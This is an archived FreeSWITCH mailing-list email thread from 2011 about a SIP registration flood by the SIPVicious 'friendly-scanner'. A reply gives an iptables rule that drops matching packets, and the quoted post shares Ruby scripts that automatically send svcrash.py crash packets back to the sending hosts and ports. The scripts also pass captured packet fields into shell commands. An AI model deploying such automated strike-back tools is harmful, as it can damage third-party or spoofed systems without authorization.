<html><head></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space; ">Or <div><br></div><div><span class="Apple-style-span" style="font-family: 'Lucida Grande'; ">iptables -I INPUT -j DROP -p udp --dport 5060 -m string --string "friendly-scanner" --algo bm</span></div><div><font class="Apple-style-span" face="'Lucida Grande'"><br></font></div><div><font class="Apple-style-span" face="'Lucida Grande'">/b</font></div><div><font class="Apple-style-span" face="'Lucida Grande'"><br></font><div><div>On Apr 20, 2011, at 6:00 PM, Peter P GMX wrote:</div><br class="Apple-interchange-newline"><blockquote type="cite"><div>Hello all,<br><br>I would like to share this with you as you may have also been affected<br>by this threat.<br><br>Yesterday we received a SPIT attack to our Freeswitch servers. We had<br>about 50 register requests/sec. We noticed this as we saw a slight<br>increase in the load of the Freeswitch servers. Fortunately Freeswitch<br>can handle a huge amount of register requests so we had no denial of<br>service.<br><br>You can identify this attack by finding the following in the Register<br>message:<br> User-Agent: friendly-scanner<br><br>How to get rid of it:<br>The attacker used Sipvicious (friendly-scanner). Sipvicious itself has a<br>nice tool "svcrash.py" wich can send a malformed packet back to the<br>attacker which crashes their own Sipvicious tool. You can issue this tool by<br> python svcrash.py -d <host of attacker> -p <port of attacker><br>You will need port 5060 on your machine to work. But there is also a<br>workaround for that. svcrash.py will show how to overcome this if your<br>port 5060 is not available.<br>Download it here<br><a href="http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz">http://sipvicious.googlecode.com/files/sipvicious-0.2.6.tar.gz</a> and<br>unpack it to a folder of your choice.<br><br>I wrote a small Ruby script to send the packet back to a port range, as<br>our attacker used some dozens of ports to send.<br>Here is the script (Install ruby first by "apt-get install ruby" e.g. on<br>Debian based systems). Put it into the sipvicious directory<br>kill_ports.rb:<br><br>#!/usr/bin/env ruby<br>host=ARGV[0]<br>start_port=ARGV[1].to_i<br>end_port=ARGV[2].to_i<br>start_port.upto(end_port) do |port|<br> cmd="python svcrash.py -d #{host} -p #{port}"<br> p cmd<br> erg=`#{cmd}`<br> p erg<br>end<br><br>You now can run it by<br>./kill_ports.rb <ip> <from_port> <to_port><br><br>By using this tool we got rid of most of the SPIT messages. But after a<br>while they started again to attack us from different ports.<br><br>The next step is: Why not automate this by trying to identify host and<br>port automatically and send back the svcrash.py packet to the sender's port?<br><br>First install the pcap library<br> apt-get install libpcap-dev libpcap-ruby<br><br>Then I wrote the following tool to automate this, it makes use of the<br>kill_ports.rb above:<br>strike_back.rb:<br><br>#!/usr/bin/env ruby<br># I used some code from <a href="http://snippets.dzone.com/posts/show/5931">http://snippets.dzone.com/posts/show/5931</a><br>require 'pcaplet'<br>require 'logger'<br>require 'timeout'<br>@timeout=3600 # max runtime: 1 hour<br><br>@logfile='strike_back.log'<br>class AuditLogger < Logger<br> def format_message(severity, timestamp, progname, msg)<br> puts msg<br> "#{msg}\n"<br> end<br>end<br><br>logfile = File.open(@logfile, 'a')<br>LOGGER = AuditLogger.new(logfile)<br>LOGGER.level = Logger::INFO<br>search="friendly-scanner"<br>puts"Searching for '#{ search}' in SIP packets"<br>$network = Pcaplet.new('-s 1500')<br>$filter = Pcap::Filter.new('udp and dst port 5060', $network.capture)<br>$network.add_filter($filter)<br>puts "Logfile: #{@logfile}"<br>puts "Starting capture..."<br>begin<br> Timeout.timeout(@timeout) do # 3600 sec<br> for p in $network<br> header= "#{Time.now.strftime("%Y-%m-%d %H:%M:%S")}<br>#{p.src}:#{p.sport} => #{p.dst}:#{p.dport}"<br> if $filter =~ p<br> #puts "simple search"<br> if p.udp_data.index(search)<br> <a href="http://LOGGER.info">LOGGER.info</a> "Kill Friendly scanner #{p.src} with Source<br>Port #{p.sport}"<br> cmd="./kill_ports.rb #{p.src} #{p.sport} #{p.sport}"<br> erg=`#{cmd}`<br> p erg<br> <a href="http://LOGGER.info">LOGGER.info</a> header<br> <a href="http://LOGGER.info">LOGGER.info</a> p.udp_data<br> end<br> end<br> end<br> end<br>rescue Timeout::Error<br> logfile.flush<br> puts "Timeout - finished."<br>end<br><br>There may be a better way to code this, but at least it worked. After<br>about 15min the number of attacks went to 0.<br><br>Disclaimer: You can damage other systems by using these tools. So be<br>carefull and use at your own risks. Do not use this tool for attacking<br>other systems!<br><br>Best regards<br>Peter<br><br>_______________________________________________<br>FreeSWITCH-users mailing list<br><a href="mailto:FreeSWITCH-users@lists.freeswitch.org">FreeSWITCH-users@lists.freeswitch.org</a><br>http://lists.freeswitch.org/mailman/listinfo/freeswitch-users<br>UNSUBSCRIBE:http://lists.freeswitch.org/mailman/options/freeswitch-users<br>http://www.freeswitch.org<br></div></blockquote></div><br></div></body></html>